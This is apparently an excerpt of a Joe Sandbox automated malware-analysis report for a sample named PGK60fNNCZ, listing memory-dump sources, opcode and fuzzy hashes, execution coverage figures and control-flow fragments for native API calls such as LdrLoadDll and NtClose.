                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d579a02cb04952069a7ce87a8309b221450bf54e9a0f89d535b0c846c86f192
                                                            • Instruction ID: 1ab577c737c19484f3d807d30a1b358d7a1d6ab59273744cf915f021ea21be98
                                                            • Opcode Fuzzy Hash: 3d579a02cb04952069a7ce87a8309b221450bf54e9a0f89d535b0c846c86f192
                                                            • Instruction Fuzzy Hash: 00213074D09209DFEB40CFA9C280AEEBBF6AB49300F505499D419A7315D7B09A44CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da887d821def7a94a33e7dee93de1bc27f902320fb4e600381d8e46da238cc4b
                                                            • Instruction ID: 23e71d62f6fd748fbfc7d9b4322d93b78853eb2979d07e6ad1721d2a61d039dc
                                                            • Opcode Fuzzy Hash: da887d821def7a94a33e7dee93de1bc27f902320fb4e600381d8e46da238cc4b
                                                            • Instruction Fuzzy Hash: B3215E74919218CFFB10DF98E588BEDBBB9FF49311F1055A5E40AA7251C770A980CF20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1326595034.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cdd000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5b2b036c4b0c596cf8ffbb23b22fb655d56c806725f1cb4b621389586a49afe
                                                            • Instruction ID: d9958f192cd0638265974247ec61303289fa037d3247e962521b7b880be09b0b
                                                            • Opcode Fuzzy Hash: f5b2b036c4b0c596cf8ffbb23b22fb655d56c806725f1cb4b621389586a49afe
                                                            • Instruction Fuzzy Hash: DD218E755093808FCB12CF24D990715BF71EB86314F28C5EBD9498B6A7C33A980ACB62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 711d4b14b77eabf22bc21b071127b8c3e4d7e56590d6d32a5b0cb380f528aa98
                                                            • Instruction ID: 735a983336fb2815da9a41ddedfd256769d134ecbbcd7e2411ece97cd413f828
                                                            • Opcode Fuzzy Hash: 711d4b14b77eabf22bc21b071127b8c3e4d7e56590d6d32a5b0cb380f528aa98
                                                            • Instruction Fuzzy Hash: 24119D70D0C2089FEB04DF98C680AEDBBF6EB4A314F548595D4089B35AC3B0AB41CB81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7404a268d2e2c265de164bd036221bd7691b81c84d35f5ebf9afb5f7a07e83bd
                                                            • Instruction ID: 9d20333790fa8b308974284caf0585197975a2f3e4ee41854f0f68ef59b7d476
                                                            • Opcode Fuzzy Hash: 7404a268d2e2c265de164bd036221bd7691b81c84d35f5ebf9afb5f7a07e83bd
                                                            • Instruction Fuzzy Hash: B921EDB4E08209DFEB44CF99C281AEEBBF6BB49300F609455D419A7755D7B0AE40CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b921f3f28820fbcb4bea6feee65fce5871cfcca7370ed598b67a325a50d767b
                                                            • Instruction ID: f53a11aa806e5d5028a13cc8f2cdef1272ccbe77565430f998bebc4cb468d24a
                                                            • Opcode Fuzzy Hash: 0b921f3f28820fbcb4bea6feee65fce5871cfcca7370ed598b67a325a50d767b
                                                            • Instruction Fuzzy Hash: 482103B5D003499FDB20CF9AD944ADEBBF4FB48310F108429E919A7300C379A955CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1326519832.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ccd000_PGK60fNNCZ.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1326595034.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cdd000_PGK60fNNCZ.jbxd
                                                            • Opcode Fuzzy Hash: c57876452d684ddae3df2dd81f9a80587620c13396430ae5e2d25e0bf817df4b
                                                            • Instruction Fuzzy Hash: 10E026722006104FE715A62ABC10557BAAFAFC9200314C52EC80987205E961A8020AC4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8634a9b52e6e40ca29ea528866e11bdeb9080ee3bb8c584bbd292efe3d4df037
                                                            • Instruction ID: a16d32e816a07abb51730569b4516a2288dc3845ec631e684cd6d6a4cefbcf63
                                                            • Opcode Fuzzy Hash: 8634a9b52e6e40ca29ea528866e11bdeb9080ee3bb8c584bbd292efe3d4df037
                                                            • Instruction Fuzzy Hash: 9EE02B777892001FF6734664A91C3F53B65DBD281AB8606F7C606C7314F556D403C622
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 469f23c83a68c661d8b9d2f3cc5ded6156b2ade03c7cdc965fdbac2b31dc0b78
                                                            • Instruction ID: 07527df080294b95d15898aedc3089f3f3b9cd5bdcceba35e06a4a340d895562
                                                            • Opcode Fuzzy Hash: 469f23c83a68c661d8b9d2f3cc5ded6156b2ade03c7cdc965fdbac2b31dc0b78
                                                            • Instruction Fuzzy Hash: 0CE0EC1291ABA05FF616A3749C606CA3F538FE6712B158593A0848E097A439885F91BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 680d2b51552c24a2c7cc5d9ec8d755910a7c62238f641708a0f7c9324c25ad46
                                                            • Instruction ID: 20f0fb3d29fc76fe3c9b3a7415c1d6409c72c87d766070fb6ffbbd729010db35
                                                            • Opcode Fuzzy Hash: 680d2b51552c24a2c7cc5d9ec8d755910a7c62238f641708a0f7c9324c25ad46
                                                            • Instruction Fuzzy Hash: F8D02B331082547FCA03AB549C458C7FFAD9F56158F18C096F148CB122D212E525C7D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e8b72d0d4f7d87552bb5baadbaf1b9d7661cc3edbd1c173c4ea0fcffa5a2081
                                                            • Instruction ID: 55c84b4e68ea7a34c1579efa39237ec59133df1e76da14f7fb87a417f677e3ae
                                                            • Opcode Fuzzy Hash: 2e8b72d0d4f7d87552bb5baadbaf1b9d7661cc3edbd1c173c4ea0fcffa5a2081
                                                            • Instruction Fuzzy Hash: 00E0B6B0D40209DFE740EFB9CA05A9EBBF5BF08200F15C9A9D019E7211E7B596048F91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0095e7fee37674894af4c86003c0ff4a67b359cf6a77d2cd31f171e087e51896
                                                            • Instruction ID: 8099ee49e0c42cf66bdaccbe65331470df4cd6982bf4e65a721e49eb63f0b644
                                                            • Opcode Fuzzy Hash: 0095e7fee37674894af4c86003c0ff4a67b359cf6a77d2cd31f171e087e51896
                                                            • Instruction Fuzzy Hash: 4EF05278A46269DFEB21CF65D941FA8BBB1BB09300F1051E6E84DA7781D3749E80CF20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a29a40f73055ddf739591cf033c1df17f9fb2183edd5fd574e15b5eab85df53
                                                            • Instruction ID: fc88d7d3c85ddce925a2f2b1f517d0b210618d0e042dc4616e31f3b585a0c73d
                                                            • Opcode Fuzzy Hash: 5a29a40f73055ddf739591cf033c1df17f9fb2183edd5fd574e15b5eab85df53
                                                            • Instruction Fuzzy Hash: 4AD0C9767843041BEB1027B4A47A35D7791D784666F148079E84E8B3C5ED6A8803C266
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab60a40815240bd4fd988d1771b9601c34d7ce2aecaf35df00c7b94467bdfec1
                                                            • Instruction ID: d5c27e98dff757c00081260569b0c8e57ccae2efe32b2bd1465350cff52c7e85
                                                            • Opcode Fuzzy Hash: ab60a40815240bd4fd988d1771b9601c34d7ce2aecaf35df00c7b94467bdfec1
                                                            • Instruction Fuzzy Hash: 05D05EE1604619CFFB1107619929BA7395DBB8D24AF5840E6D90396A81DBA48402CB19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5779fe00a19401f10da431b362e1807a8a57a6c42c92179ddd4d01db8bd03b5c
                                                            • Instruction ID: 30ba7e7acaaf6555fb243a37ce5020a12fbb91f287f212a24dee34cfbc805da2
                                                            • Opcode Fuzzy Hash: 5779fe00a19401f10da431b362e1807a8a57a6c42c92179ddd4d01db8bd03b5c
                                                            • Instruction Fuzzy Hash: 3DD0123624020C9E6B40EEA5E900DA27BDDBB587403408472E504C7421E661F525E791
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ee44bba3bde1158578db40c38daff3e06c8cd437e0adc6f22b81041c2910b02
                                                            • Instruction ID: 0c2a640b6cc431973d651c0f80dfe9264efbee9c49d13a025c6cde3cb62fbeeb
                                                            • Opcode Fuzzy Hash: 1ee44bba3bde1158578db40c38daff3e06c8cd437e0adc6f22b81041c2910b02
                                                            • Instruction Fuzzy Hash: 15C012322000187B4A01AB85D904CC7BBADAF89654314C056E5088B121D662F51697D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e8bc6403f8659d2d738db9c74dff355cbefc8d7ae8b1c245f3ad71394a6d16f
                                                            • Instruction ID: d993d9a033cbf33d59fe72665128360905a214915841af0f0d83a1b9ca805011
                                                            • Opcode Fuzzy Hash: 3e8bc6403f8659d2d738db9c74dff355cbefc8d7ae8b1c245f3ad71394a6d16f
                                                            • Instruction Fuzzy Hash: 5AC0123107A2109BF7106BA8A60D2E43B65AB45252F480112F00B904B0CE614899C6A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3eefbd2242816f735417090c8bc57357ca3aee94c863fecfb078fa92d185f90e
                                                            • Instruction ID: fa6b30f3db5b84388eb213e0f6d7d85d54a4a252372c366152055d69fe68d4e6
                                                            • Opcode Fuzzy Hash: 3eefbd2242816f735417090c8bc57357ca3aee94c863fecfb078fa92d185f90e
                                                            • Instruction Fuzzy Hash: E5C08C757803080BEB1023B5A43971E76DAE7C462AF1040A9A80E873C5FD7A8C02C229
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d96bb24b30dbc3c1cb973a7f2dd55705f09e28178ce6eafb9f19ea2e0d86bf5b
                                                            • Instruction ID: 3e41d5a184dde90cd5f3546376f8bb4d0882106cc95abe56596858c8917e3ddb
                                                            • Opcode Fuzzy Hash: d96bb24b30dbc3c1cb973a7f2dd55705f09e28178ce6eafb9f19ea2e0d86bf5b
                                                            • Instruction Fuzzy Hash: 61C09BE6F546050BF914513D4C7238F4391A38156CFD856985098DF3D9FE25D907D391
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14ba0eaaf45a92aef4b70d759448a6297840275fa2a8c9c804824e18fd9f8843
                                                            • Instruction ID: 26edd1b0272161d76581951f01154a1ad2272e26e2d536dcfc01e61918ab6e8b
                                                            • Opcode Fuzzy Hash: 14ba0eaaf45a92aef4b70d759448a6297840275fa2a8c9c804824e18fd9f8843
                                                            • Instruction Fuzzy Hash: 2EC08C3006E3049BF300AB98A50E3643AAC7B01312F840010F10E404B08FA008C4CAB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61264929e20a4d1af412c0aac1fade93dde824225db5ca3255b2a2ac362b7998
                                                            • Instruction ID: db3a01a6ae3144c859c83e96cd8fe2295ea60a229687059a8383d8e13aedc681
                                                            • Opcode Fuzzy Hash: 61264929e20a4d1af412c0aac1fade93dde824225db5ca3255b2a2ac362b7998
                                                            • Instruction Fuzzy Hash: 9CC08CE26C93880FE7224370283E20C6E616B8650679890C6D940DA382E824480A4712
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1557a8dd1cd306f8e693887f09774beb616cfd682382d20e0e5e5d16649fb64
                                                            • Instruction ID: 7fec2b53f9e45c6cb1a5feb1f83655004be776fa0794b208757c4410e768e6a4
                                                            • Opcode Fuzzy Hash: a1557a8dd1cd306f8e693887f09774beb616cfd682382d20e0e5e5d16649fb64
                                                            • Instruction Fuzzy Hash: F6C08C3814D1454FDB024F60CA493A43F22EF43318F2400E0D0808B29ACAA98513CB12
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 361b58b2a1ffaac0c798cc62f2df8718dc1322d23206dba03aa3a3082cbc9118
                                                            • Instruction ID: 174f3a2023916719fbc2684f30b1fecc5e38572277fa8de2de3420c99c2a2dc7
                                                            • Opcode Fuzzy Hash: 361b58b2a1ffaac0c798cc62f2df8718dc1322d23206dba03aa3a3082cbc9118
                                                            • Instruction Fuzzy Hash: D4C08C7000E204CFE308CBB4C8854203B3DBF0B2123041CF984091A416CA315044CF22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50a30bd224ebaa628e6a61fcaa8df610695fd4968a7efd1f3e125199e1c4d129
                                                            • Instruction ID: fb0fc1e9e98dea036a36acf24de5c9906bb8281702c85c371a591a4118c0adec
                                                            • Opcode Fuzzy Hash: 50a30bd224ebaa628e6a61fcaa8df610695fd4968a7efd1f3e125199e1c4d129
                                                            • Instruction Fuzzy Hash: BBB012352E4341B37400A2E48E68B6F5C13ABE1F00B10CC02320910012C6A0B42DE12F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11ee1989e591a921570cc180bfcfedddd6238d30716577d756d09cfa5d142908
                                                            • Instruction ID: 310512c3145acccc02dcc289ebfb241e0771cfcdb812b3c1a5cc0bd4f70dc21f
                                                            • Opcode Fuzzy Hash: 11ee1989e591a921570cc180bfcfedddd6238d30716577d756d09cfa5d142908
                                                            • Instruction Fuzzy Hash: FAE1F8B4E002598FDB14DFA9C590AAEFBF2BF89305F248169D414AB359D730AD81CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7b26c9bfd3f98645df12268030c2a2cf1d7a714ddcb96353c5a24d3b0813b1b
                                                            • Instruction ID: 8f3eeb011e23c0b2d1d880dc31fae65d6a83171aab86875ae7d27f129e5c61db
                                                            • Opcode Fuzzy Hash: d7b26c9bfd3f98645df12268030c2a2cf1d7a714ddcb96353c5a24d3b0813b1b
                                                            • Instruction Fuzzy Hash: F3E1F6B4E006598FDB14DFA8C590AAEFBF2BF89304F248169D414AB355D771AD42CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f2f9bfca4a10dad4e93e182c8062c5935606407204a27b4499618aabe5c374d
                                                            • Instruction ID: 36213691a05dcae6aa36d855ec80861ece1ce0611d4c0da1d90cc10ed4814f55
                                                            • Opcode Fuzzy Hash: 3f2f9bfca4a10dad4e93e182c8062c5935606407204a27b4499618aabe5c374d
                                                            • Instruction Fuzzy Hash: BFE1E6B4E002598FDB14DFA9C590AAEFBF2BF89304F248169D414AB355D730AD85CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b355c72e36726a5caad2bb851188f3cdce5c65368661fcaba77643e6f9b8d7c
                                                            • Instruction ID: 5874a0a3a5ad06a46f709ffe68c000c63915107f7ae20a1227dc525e0ce7cb0b
                                                            • Opcode Fuzzy Hash: 1b355c72e36726a5caad2bb851188f3cdce5c65368661fcaba77643e6f9b8d7c
                                                            • Instruction Fuzzy Hash: CDE1F8B4E002598FDB14DFA9C590AAEFBF2BF89304F248169D414AB355D731AD82CF61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6189259f515fcf8080d510c5db994d2e217b64e726e94c8668fd2a2923347720
                                                            • Instruction ID: 4a4143af8e1a9d72bb910f19ef81c4f600525018a2c096fd606ab4e29a84c3d7
                                                            • Opcode Fuzzy Hash: 6189259f515fcf8080d510c5db994d2e217b64e726e94c8668fd2a2923347720
                                                            • Instruction Fuzzy Hash: 51A14B36E006098FCF19DFB4D84459EBBB2FF85300B25856EE806AB261DB35E946CF51

                                                            Execution Graph

                                                            Execution Coverage:1.1%
                                                            Dynamic/Decrypted Code Coverage:5.3%
                                                            Signature Coverage:8.3%
                                                            Total number of Nodes:133
                                                            Total number of Limit Nodes:10

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 215 417e43-417e6c call 42faf3 218 417e72-417e80 call 4300f3 215->218 219 417e6e-417e71 215->219 222 417e90-417ea1 call 42e563 218->222 223 417e82-417e8d call 430393 218->223 228 417ea3-417eb7 LdrLoadDll 222->228 229 417eba-417ebd 222->229 223->222 228->229
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                            • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 258 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                            • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 272 fd2b60-fd2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction ID: 3e764b1e9f245c7651c747a94e849b882e0032962d548aa108ace271c68f3463
                                                            • Opcode Fuzzy Hash: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction Fuzzy Hash: 0990026120244013420571598414616400A87E0741B55C032E1054590EC92989927126
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction ID: aa0ef7dc569921d01adcd22b94149f9d3583c54bd46764b4a3a2b720793a5fc0
                                                            • Opcode Fuzzy Hash: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction Fuzzy Hash: BD9002312014C812D2107159C40474A000587D0741F59C432A4464658E8A9989927122
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
